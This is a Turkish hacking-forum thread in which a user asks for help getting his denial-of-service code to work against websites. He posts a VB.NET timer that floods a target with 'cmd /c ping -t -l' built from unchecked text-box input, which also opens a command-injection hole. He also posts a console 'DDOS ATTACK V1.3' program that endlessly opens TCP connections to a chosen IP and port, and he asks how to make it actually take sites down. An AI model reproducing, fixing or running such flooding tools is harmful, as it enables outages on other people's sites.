bu kodlar çalışıyormu yardım

baba hack

Katılımcı Üye
26 Ara 2015
258
0
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
Shell("cmd /c ping " & TextBox1.Text + "-t -l" + ComboBox1.Text)
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
Timer1.Enabled = False
MsgBox("Siteye Saldırı Durdu.!", vbCritical, "Bilgi")
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Timer1.Enabled = True
MsgBox("Siteye Saldırı Başladı Site Pingleniyor..", vbInformation, "Bilgi")
End Sub

baba hack

Katılımcı Üye
26 Ara 2015
258
0
visual basic için ping kodları benbiraz bişeyler ekledim combobox gibi sadece textbox1 varken cmd ekranı açılıyordu ping atıp atmadıgını anlayabiliyordum ama şimdi açılmıyor ping atıp atmadıgını anlayamıyorum yardım edermisiniz

baba hack

Katılımcı Üye
26 Ara 2015
258
0
nasıl kodlar lazım bunlar işe yararmı ben bu kodu denedim ama sadece benden kapatıyor siteyi ne yapmam lazım işe yaraması için
Imports System.Net
Imports System.Net.Sockets
Module Module1

Sub Main()
Console.ForegroundColor = ConsoleColor.Green
Console.WriteLine(" ")
Console.WriteLine(" DDOS ATTACK V1.3 ")
Console.WriteLine(" ")
Console.WriteLine(" By ZEROCOOL DDOS ATTACK ")
Console.WriteLine(" ")
Console.WriteLine(" ")
Console.WriteLine(" ")
Console.ForegroundColor = ConsoleColor.Green
Console.WriteLine("IP:")
Dim ip As String = Console.ReadLine
Console.WriteLine("PORT:")
Dim porta As Integer = Console.ReadLine
Dim x As Integer
Do
Try
Dim iep As IPEndPoint
iep = New IPEndPoint(IPAddress.Parse(ip), Convert.ToInt32(porta)) 'target
Dim s As Socket = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
s.Connect(iep)
s.Close()
x += 1

Console.WriteLine("Pacchetti Inviati: " & x)
Catch ex As Exception
Console.ForegroundColor = ConsoleColor.Red
Console.WriteLine("Pacchetti Inviati: " & x)
End Try
Loop
End Sub
End Module

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.